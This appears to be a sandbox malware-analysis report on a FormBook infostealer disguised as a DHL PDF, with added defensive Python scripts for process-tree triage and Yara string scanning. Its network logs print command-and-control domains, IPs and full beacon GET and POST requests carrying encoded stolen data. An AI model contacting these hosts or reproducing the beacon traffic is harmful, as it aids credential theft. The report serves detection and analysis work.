Windows Analysis Report
DHL_Notification_pdf.exe

Overview

General Information

Sample Name:DHL_Notification_pdf.exe
Analysis ID:830435
MD5:06f7894017e8f6737d228adc14480c83
SHA1:fab1cbdbbb5fc2e76de2622948a02c3e8af17c18
SHA256:bbfb2aacf1ff431d0ed71b54c499d3a56b6bcc90d5137cd78097b40c354c2353
Tags:DHLexeFormbook

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • DHL_Notification_pdf.exe (PID: 5084 cmdline: C:\Users\user\Desktop\DHL_Notification_pdf.exe MD5: 06F7894017E8F6737D228ADC14480C83)
    • ldndbi.exe (PID: 3008 cmdline: "C:\Users\user~1\AppData\Local\Temp\ldndbi.exe" C:\Users\user~1\AppData\Local\Temp\qlqjt.de MD5: C99B9B59B44F7789DD46E5230C22A9CD)
      • conhost.exe (PID: 4584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • ldndbi.exe (PID: 6108 cmdline: C:\Users\user~1\AppData\Local\Temp\ldndbi.exe MD5: C99B9B59B44F7789DD46E5230C22A9CD)
        • explorer.exe (PID: 3320 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • cmmon32.exe (PID: 5228 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)
  • cleanup
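The process tree above is the whole infection chain in one picture: a document-named executable on the Desktop drops ldndbi.exe into %TEMP%, that binary re-launches itself, Explorer.EXE appears beneath it and then spawns the 32-bit cmmon32.exe, and the Networking section attributes every outbound port-80 connection to explorer.exe. The Python script below is an added example, not part of the Joe Sandbox report or its signature engine: it transcribes that tree and those connections into a small event list and runs the checks a triage analyst would write against it (document-looking .exe name, execution from Temp, a Temp binary re-spawning itself, Windows binaries reached only through the Temp chain, and a Windows-directory process fanning out to many web hosts). The document-token list, the conhost.exe allowance and the fan-out threshold of five hosts are assumptions, not values taken from the report.

```python
"""Triage rules over the process tree and network events shown in the report.

Added example, not part of the Joe Sandbox report and not its signature
logic.  The event list is transcribed by hand from the report's process tree
and "Network Connect" lines (PIDs, image paths and IPs as printed there); the
rules, the token list and the fan-out threshold are assumptions.
"""
from collections import defaultdict
from dataclasses import dataclass
import ntpath


@dataclass
class Proc:
    pid: int
    ppid: int
    image: str
    cmdline: str = ""


@dataclass
class Connect:
    pid: int
    ip: str
    port: int


# Process tree as printed in the report.  Explorer.EXE is nested under
# ldndbi.exe (PID 6108) there, and that nesting is kept here as printed.
PROCS = [
    Proc(5084, 0, r"C:\Users\user\Desktop\DHL_Notification_pdf.exe"),
    Proc(3008, 5084, r"C:\Users\user\AppData\Local\Temp\ldndbi.exe",
         r'"C:\Users\user~1\AppData\Local\Temp\ldndbi.exe" C:\Users\user~1\AppData\Local\Temp\qlqjt.de'),
    Proc(4584, 3008, r"C:\Windows\system32\conhost.exe", "0xffffffff -ForceV1"),
    Proc(6108, 3008, r"C:\Users\user\AppData\Local\Temp\ldndbi.exe"),
    Proc(3320, 6108, r"C:\Windows\Explorer.EXE"),
    Proc(5228, 3320, r"C:\Windows\SysWOW64\cmmon32.exe"),
]

# "Network Connect" lines the report attributes to explorer.exe.
CONNECTS = [Connect(3320, ip, 80) for ip in (
    "198.46.160.97", "1.13.186.125", "219.94.129.181", "162.0.231.77",
    "67.222.24.48", "49.212.180.95", "162.241.24.110")]

DOC_TOKENS = ("pdf", "doc", "docx", "xls", "xlsx", "jpg", "png")  # assumed list
TEMP_MARK = "\\appdata\\local\\temp\\"
WINDOWS_DIR = "c:\\windows\\"
ALLOWED_WINDOWS_CHILDREN = {"conhost.exe"}  # assumption: a console host is a normal child


def basename(path):
    return ntpath.basename(path).lower()


def in_temp(path):
    return TEMP_MARK in path.lower()


def in_windows(path):
    return path.lower().startswith(WINDOWS_DIR)


def ancestors(proc, by_pid):
    """Yield parent, grandparent, ... by following the ppid links in the tree."""
    p = by_pid.get(proc.ppid)
    while p is not None:
        yield p
        p = by_pid.get(p.ppid)


def triage(procs, connects, fan_out_min=5):
    """Return (rule, pid, detail) tuples for every rule that fires."""
    by_pid = {p.pid: p for p in procs}
    findings = []
    for p in procs:
        name = basename(p.image)
        stem = name[:-4] if name.endswith(".exe") else name
        # Document-looking name carrying an .exe extension ("..._pdf.exe").
        if any(stem.endswith(("_" + t, "." + t, "-" + t)) for t in DOC_TOKENS):
            findings.append(("suspicious_name", p.pid, name))
        # Executable running out of %TEMP%, and a Temp executable re-launching itself.
        if in_temp(p.image):
            findings.append(("temp_exec", p.pid, p.image))
            parent = by_pid.get(p.ppid)
            if parent is not None and basename(parent.image) == name:
                findings.append(("self_respawn", p.pid, f"{p.ppid} -> {p.pid}"))
        # A Windows binary the tree reaches only through a Temp-dropped executable.
        if in_windows(p.image) and name not in ALLOWED_WINDOWS_CHILDREN:
            if any(in_temp(a.image) for a in ancestors(p, by_pid)):
                findings.append(("windows_binary_under_temp_chain", p.pid, name))
    # A Windows-directory process fanning out to many distinct web hosts.
    ips_by_pid = defaultdict(set)
    for c in connects:
        if c.port in (80, 443):
            ips_by_pid[c.pid].add(c.ip)
    for pid, ips in ips_by_pid.items():
        p = by_pid.get(pid)
        if p is not None and in_windows(p.image) and len(ips) >= fan_out_min:
            findings.append(("system_process_fan_out", pid,
                             f"{basename(p.image)} -> {len(ips)} hosts"))
    return findings


if __name__ == "__main__":
    for rule, pid, detail in triage(PROCS, CONNECTS):
        print(f"{rule:32} pid={pid:<5} {detail}")
```

Run on the transcribed tree, every rule fires once or twice: the Desktop sample for its name, both ldndbi.exe instances for running from Temp (the second also for re-spawning its parent's image), Explorer.EXE and cmmon32.exe for sitting beneath the Temp chain, and explorer.exe for its seven-host fan-out. Against real EDR telemetry the ppid links would come from process-creation events rather than from the sandbox's injection-aware tree, so the "under temp chain" rule would need the injection events added as edges.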
No configs have been found
Yara matches (memory dumps)
Source | Rule | Description | Author | Strings

Source: 00000005.00000002.508997363.0000000000E50000.00000040.10000000.00040000.00000000.sdmp
  Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
  Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
    • 0x1efd0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xae2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x18217:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
  Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0x18015:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x17ab1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x18117:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1828f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa9fa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x16d0c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1dd87:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ed3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 00000005.00000002.508740330.0000000000C00000.00000040.80000000.00040000.00000000.sdmp
  Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
  Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
    • 0x1efd0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xae2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x18217:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
  (13 further entries not shown in this extract)

Yara matches (unpacked PEs)
Source | Rule | Description | Author | Strings

Source: 3.2.ldndbi.exe.400000.0.unpack
  Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
  Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
    • 0x1ffc3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xbe22:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x1920a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
  Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0x19008:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x18aa4:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x1910a:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x19282:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xb9ed:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x17cff:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1ed7a:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1fd2d:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 3.2.ldndbi.exe.400000.0.raw.unpack
  Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
  Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
    • 0x20dc3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xcc22:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x1a00a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
  (1 further entry not shown in this extract)
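The Yara tables above list, for each dump, which strings of Windows_Trojan_Formbook_1112e116 and of the yara-signator rule fired and at which offset; the same bytes sit at different offsets in the mapped memory dump, the unpacked PE and the raw unpack, so the offsets are artefact-specific while the byte strings carry across. The Python script below is an added example, not code from the report or from the rule authors: it takes exactly those byte strings, scans a buffer for them the way a Yara engine would, and renders them back into a rule text for hunting in other dumps. The "any of them" condition is an assumption (the report shows only which strings matched), and the sample buffer is constructed so that each string sits at the offset the report gives for the 0xE50000 dump of PID 5228.

```python
"""Locate the FormBook byte signatures listed in the report inside a buffer.

Added example, not part of the Joe Sandbox report and not the rule authors'
code.  The byte strings are the ones the report lists as matching for
Windows_Trojan_Formbook_1112e116 ($a2..$a4) and yara-signator's Formbook_1
($sequence_1..9).  The "any of them" condition is an assumption, and the
sample buffer is constructed with each string planted at the offset the
report gives for the 0xE50000 memory dump of PID 5228.
"""

# Strings of Windows_Trojan_Formbook_1112e116 that fired, as listed in the report.
ELASTIC_STRINGS = {
    "$a2": "74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55",
    "$a3": "1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01",
    "$a4": "04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83",
}

# Strings of the yara-signator rule Formbook_1 that fired, as listed in the report.
SIGNATOR_STRINGS = {
    "$sequence_1": "3C 24 0F 84 76 FF FF FF 3C 25 74 94",
    "$sequence_2": "3B 4F 14 73 95 85 C9 74 91",
    "$sequence_3": "3C 69 75 44 8B 7D 18 8B 0F",
    "$sequence_4": "5D C3 8D 50 7C 80 FA 07",
    "$sequence_5": "0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06",
    "$sequence_6": "57 89 45 FC 89 45 F4 89 45 F8",
    "$sequence_8": "3C 54 74 04 3C 74 75 F4",
    "$sequence_9": "56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00",
}

# Offsets the report gives for these strings in the 0xE50000 memory dump.
REPORT_OFFSETS = {
    "$a2": 0x1EFD0, "$a3": 0xAE2F, "$a4": 0x18217,
    "$sequence_1": 0x18015, "$sequence_2": 0x17AB1, "$sequence_3": 0x18117,
    "$sequence_4": 0x1828F, "$sequence_5": 0xA9FA, "$sequence_6": 0x16D0C,
    "$sequence_8": 0x1DD87, "$sequence_9": 0x1ED3A,
}


def hex_to_bytes(hexstr):
    return bytes.fromhex(hexstr)  # bytes.fromhex skips the spaces between byte pairs


def find_all(buf, pat):
    """Every offset at which pat occurs in buf, overlapping hits included."""
    offsets, i = [], buf.find(pat)
    while i != -1:
        offsets.append(i)
        i = buf.find(pat, i + 1)
    return offsets


def scan(buf, strings):
    """Return {string_name: [offsets]} for each string present in buf."""
    hits = {}
    for name, hexstr in strings.items():
        found = find_all(buf, hex_to_bytes(hexstr))
        if found:
            hits[name] = found
    return hits


def verdict(hits, minimum=1):
    """'any of them'-style condition (assumption): at least `minimum` strings hit."""
    return len(hits) >= minimum


def to_yara(rule_name, strings, condition="any of them"):
    """Render the strings as YARA rule text for hunting in other dumps."""
    body = "\n".join(f"        {name} = {{ {hexstr} }}" for name, hexstr in strings.items())
    return (f"rule {rule_name}\n{{\n    strings:\n{body}\n"
            f"    condition:\n        {condition}\n}}\n")


def build_sample_buffer(size=0x20000, filler=0xCC):
    """Constructed dump: filler bytes with every string planted at its report offset."""
    buf = bytearray([filler]) * size
    for name, off in REPORT_OFFSETS.items():
        pat = hex_to_bytes({**ELASTIC_STRINGS, **SIGNATOR_STRINGS}[name])
        buf[off:off + len(pat)] = pat
    return bytes(buf)


if __name__ == "__main__":
    dump = build_sample_buffer()
    for name, offsets in sorted(scan(dump, {**ELASTIC_STRINGS, **SIGNATOR_STRINGS}).items()):
        print(name, [hex(o) for o in offsets])
    print(to_yara("FormBook_report_830435_strings", ELASTIC_STRINGS))
```

Pointed at the constructed buffer, `scan` reproduces the eleven offsets the report prints for the 0xE50000 dump; pointed at a real process-memory dump (read the file into `bytes` and pass it in) the offsets differ per artefact, which is why a hunting rule should key on the strings and a condition, never on offsets.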
          No Sigma rule has matched
Snort IDS alert
Timestamp: 03/20/23-11:29:43.795616
SID: 2023883
Source IP: 192.168.2.7
Source Port: 50513
Destination IP: 8.8.8.8
Destination Port: 53
Protocol: UDP
Classtype: Potentially Bad Traffic


          AV Detection

Source: DHL_Notification_pdf.exe | ReversingLabs: Detection: 53%
Source: DHL_Notification_pdf.exe | Virustotal: Detection: 46%
Source: Yara match | File source: 3.2.ldndbi.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.ldndbi.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.508997363.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.508740330.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.290138385.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.290222663.0000000000490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.292007151.0000000000D20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.509702408.00000000011A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: http://www.yongleproducts.com/hpb7/?MWgiD_=Gt_IudmBZP&pgoMAr2=qNzMMFnF92wYqby | Avira URL Cloud: Label: malware
Source: http://www.traindic.top/hpb7/?pgoMAr2=bTtFiHq0GQrF6aFlJXqsXsYFYYSgPtrX4CJLxcpJGK/F7H1QBurO56xriJCe1rAnTJlhkBPAE1A8g1vh/R7dLaG3D1YJBFes4W4zIdoETPhG&MWgiD_=Gt_IudmBZP | Avira URL Cloud: Label: malware
Source: http://www.adoptiveimmunotech.com/hpb7/ | Avira URL Cloud: Label: malware
Source: http://www.mindsetlighting.xyz/hpb7/ | Avira URL Cloud: Label: malware
Source: http://www.0dhy.xyz/hpb7/ | Avira URL Cloud: Label: malware
Source: http://www.amirah.cfd/hpb7/ | Avira URL Cloud: Label: phishing
Source: http://www.amirah.cfd | Avira URL Cloud: Label: phishing
Source: http://www.traindic.top/hpb7/ | Avira URL Cloud: Label: malware
Source: http://www.admet01.club | Avira URL Cloud: Label: malware
Source: http://www.0dhy.xyz/hpb7/?pgoMAr2=BrlYCq9+qqzfybZpwXKugHGOc0m4ktDYrdhK4pNzcFj3giICUF3BZQEP3ssdPmgNj5Kg/PdRxbVpWQCkOBnfQOgdZDSA0ZYkxsRLP7vho3iJ&MWgiD_=Gt_IudmBZP | Avira URL Cloud: Label: malware
Source: http://www.adoptiveimmunotech.com/hpb7/j | Avira URL Cloud: Label: malware
Source: http://www.traindic.top | Avira URL Cloud: Label: malware
Source: http://www.yongleproducts.com/hpb7/ | Avira URL Cloud: Label: malware
Source: http://www.admet01.club/hpb7/ | Avira URL Cloud: Label: malware
Source: http://www.mindsetlighting.xyz | Avira URL Cloud: Label: malware
Source: bohndigitaltech.com | Virustotal: Detection: 5%
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | ReversingLabs: Detection: 18%
Source: DHL_Notification_pdf.exe | Joe Sandbox ML: detected
Source: 3.2.ldndbi.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.ldndbi.exe.5d0000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: DHL_Notification_pdf.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: DHL_Notification_pdf.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: cmmon32.pdb | source: ldndbi.exe, 00000003.00000002.292162847.00000000025E0000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: cmmon32.pdbGCTL | source: ldndbi.exe, 00000003.00000002.292162847.00000000025E0000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP | source: ldndbi.exe, 00000001.00000003.250768478.000000001A020000.00000004.00001000.00020000.00000000.sdmp, ldndbi.exe, 00000001.00000003.250473705.00000000020E0000.00000004.00001000.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000003.251325612.00000000006B5000.00000004.00000020.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000003.252803862.0000000000853000.00000004.00000020.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000002.290692933.0000000000B0F000.00000040.00001000.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000002.290692933.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.509909068.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.291844113.0000000004AF6000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.289955771.000000000495A000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.509909068.0000000004DAF000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: ldndbi.exe, ldndbi.exe, 00000003.00000003.251325612.00000000006B5000.00000004.00000020.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000003.252803862.0000000000853000.00000004.00000020.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000002.290692933.0000000000B0F000.00000040.00001000.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000002.290692933.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.509909068.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.291844113.0000000004AF6000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.289955771.000000000495A000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.509909068.0000000004DAF000.00000040.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe | Code function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe | Code function: 0_2_0040699E FindFirstFileW,FindClose,
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe | Code function: 0_2_0040290B FindFirstFileW,
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 1_2_004089F8 FindFirstFileExW,
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 4x nop then xor ebx, ebx

          Networking

Source: C:\Windows\explorer.exe | Network Connect: 198.46.160.97 80
Source: C:\Windows\explorer.exe | Domain query: www.denko-kosan.com
Source: C:\Windows\explorer.exe | Domain query: www.traindic.top
Source: C:\Windows\explorer.exe | Network Connect: 1.13.186.125 80
Source: C:\Windows\explorer.exe | Network Connect: 219.94.129.181 80
Source: C:\Windows\explorer.exe | Network Connect: 162.0.231.77 80
Source: C:\Windows\explorer.exe | Network Connect: 67.222.24.48 80
Source: C:\Windows\explorer.exe | Network Connect: 49.212.180.95 80
Source: C:\Windows\explorer.exe | Domain query: www.bohndigitaltech.com
Source: C:\Windows\explorer.exe | Domain query: www.0dhy.xyz
Source: C:\Windows\explorer.exe | Domain query: www.yongleproducts.com
Source: C:\Windows\explorer.exe | Network Connect: 162.241.24.110 80
Source: C:\Windows\explorer.exe | Domain query: www.rifleroofers.com
Source: C:\Windows\explorer.exe | Domain query: www.kunimi.org
Source: C:\Windows\explorer.exe | Domain query: www.amirah.cfd
Source: C:\Windows\explorer.exe | Domain query: www.bisarropainting.com
Source: Traffic | Snort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.7:50513 -> 8.8.8.8:53
Source: C:\Windows\explorer.exe | DNS query: www.0dhy.xyz
Source: Joe Sandbox View | ASN Name: AS-COLOCROSSINGUS
Source: global traffic | HTTP traffic detected: GET /hpb7/?pgoMAr2=BrlYCq9+qqzfybZpwXKugHGOc0m4ktDYrdhK4pNzcFj3giICUF3BZQEP3ssdPmgNj5Kg/PdRxbVpWQCkOBnfQOgdZDSA0ZYkxsRLP7vho3iJ&MWgiD_=Gt_IudmBZP HTTP/1.1 | Host: www.0dhy.xyz | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /hpb7/?MWgiD_=Gt_IudmBZP&pgoMAr2=LsyOeIgM/ET1t5hHa8GhcP6qBeQiLfhDrF81hKHttqb/Il/dsCibnuekbaxwoyPtCZtmftv1iNZwvaen+NIbedtv8fxp/SmPPkaBaUqgtGDC HTTP/1.1 | Host: www.kunimi.org | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /hpb7/?pgoMAr2=bTtFiHq0GQrF6aFlJXqsXsYFYYSgPtrX4CJLxcpJGK/F7H1QBurO56xriJCe1rAnTJlhkBPAE1A8g1vh/R7dLaG3D1YJBFes4W4zIdoETPhG&MWgiD_=Gt_IudmBZP HTTP/1.1 | Host: www.traindic.top | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /hpb7/?MWgiD_=Gt_IudmBZP&pgoMAr2=+QEmeUzOQAV/evbBmcNZRFxNHMmEBYUw3TD399HaSALRcdrdntvE2stvjFfWDoHleQ7kMHGKc1CQfriDp0h38HiNDm4XeyJxX5vlkTTrS1xP HTTP/1.1 | Host: www.bohndigitaltech.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /hpb7/?pgoMAr2=Sr1AjUgE1bmYtN0hdeH1+2eYW2bz9zJIy7x8VWFTjEXaDkIuvqWhFoT+O4ddqC6+eWArdJNQDIDq/++CVSPCikRZslZ7vUOEqSXS/sLR9FgE&MWgiD_=Gt_IudmBZP HTTP/1.1 | Host: www.rifleroofers.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /hpb7/?MWgiD_=Gt_IudmBZP&pgoMAr2=NuHAd+vfjtmC4E+cdz1CpM6J6ScGh9KWfGXGi6oH+281UYUkr6SouFSZ7LMQAOLiSk3FYsgr8Pu9aCQzqq/MT4aa5FcMBKGUU6DgJQXharGK HTTP/1.1 | Host: www.denko-kosan.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 198.46.160.97
Source: Joe Sandbox View | IP Address: 67.222.24.48
Source: global traffic | HTTP traffic detected: POST /hpb7/ HTTP/1.1 | Host: www.kunimi.org | Connection: close | Content-Length: 193 | Cache-Control: no-cache | Origin: http://www.kunimi.org | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.kunimi.org/hpb7/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Raw: 70 67 6f 4d 41 72 32 3d 47 75 61 75 64 39 45 4f 77 48 76 76 68 62 77 68 55 70 32 5f 62 59 48 39 4f 65 73 6d 4f 5a 6c 61 76 33 55 61 6d 59 76 44 30 34 4c 4d 49 46 6d 4b 37 6a 61 33 72 71 57 59 66 61 6f 53 34 41 7a 58 48 5a 6c 72 54 63 71 45 75 65 68 32 70 50 69 6a 67 35 4e 71 62 74 42 72 79 38 78 4a 38 52 71 56 4a 7a 7a 39 58 33 43 2d 69 69 33 4f 56 4f 4d 48 6a 67 4d 72 61 51 59 64 79 70 39 4d 28 43 33 37 52 2d 42 49 50 47 33 5a 4d 5a 73 6b 6f 73 6b 4f 5a 63 71 39 38 58 43 52 6c 6d 31 4f 38 4f 4a 49 68 52 6d 6b 33 2d 62 70 38 4d 73 30 7a 41 28 4d 62 67 79 61 5a 5f 59 2e 00 00 00 00 00 00 00 00 | Data Ascii: pgoMAr2=Guaud9EOwHvvhbwhUp2_bYH9OesmOZlav3UamYvD04LMIFmK7ja3rqWYfaoS4AzXHZlrTcqEueh2pPijg5NqbtBry8xJ8RqVJzz9X3C-ii3OVOMHjgMraQYdyp9M(C37R-BIPG3ZMZskoskOZcq98XCRlm1O8OJIhRmk3-bp8Ms0zA(MbgyaZ_Y.
Source: global traffic | HTTP traffic detected: POST /hpb7/ HTTP/1.1 | Host: www.traindic.top | Connection: close | Content-Length: 193 | Cache-Control: no-cache | Origin: http://www.traindic.top | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.traindic.top/hpb7/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Raw: 70 67 6f 4d 41 72 32 3d 57 52 46 6c 68 77 33 4b 41 67 62 35 79 6f 39 32 4c 58 32 55 49 66 4d 47 50 4f 4b 31 66 4a 62 56 28 69 74 4d 28 38 56 68 59 34 6e 36 6c 32 30 54 41 4c 44 50 71 72 56 5f 71 4c 69 59 79 4d 34 70 4c 50 77 6a 68 58 6d 62 4a 54 5a 6e 30 33 33 53 7e 68 48 53 44 75 71 73 4b 48 77 41 51 79 6d 33 68 44 59 6b 5a 63 77 6b 61 61 6c 4e 73 61 66 51 51 66 4e 36 46 73 6c 68 46 6e 76 78 36 30 6d 5f 53 66 75 2d 77 43 4d 67 56 46 66 75 61 59 72 78 64 6b 71 55 38 67 56 70 78 6f 75 4d 30 38 6f 4e 7e 53 50 68 6f 4d 56 75 35 66 50 46 49 49 58 6f 42 58 5a 7a 69 2d 4d 2e 00 00 00 00 00 00 00 00 | Data 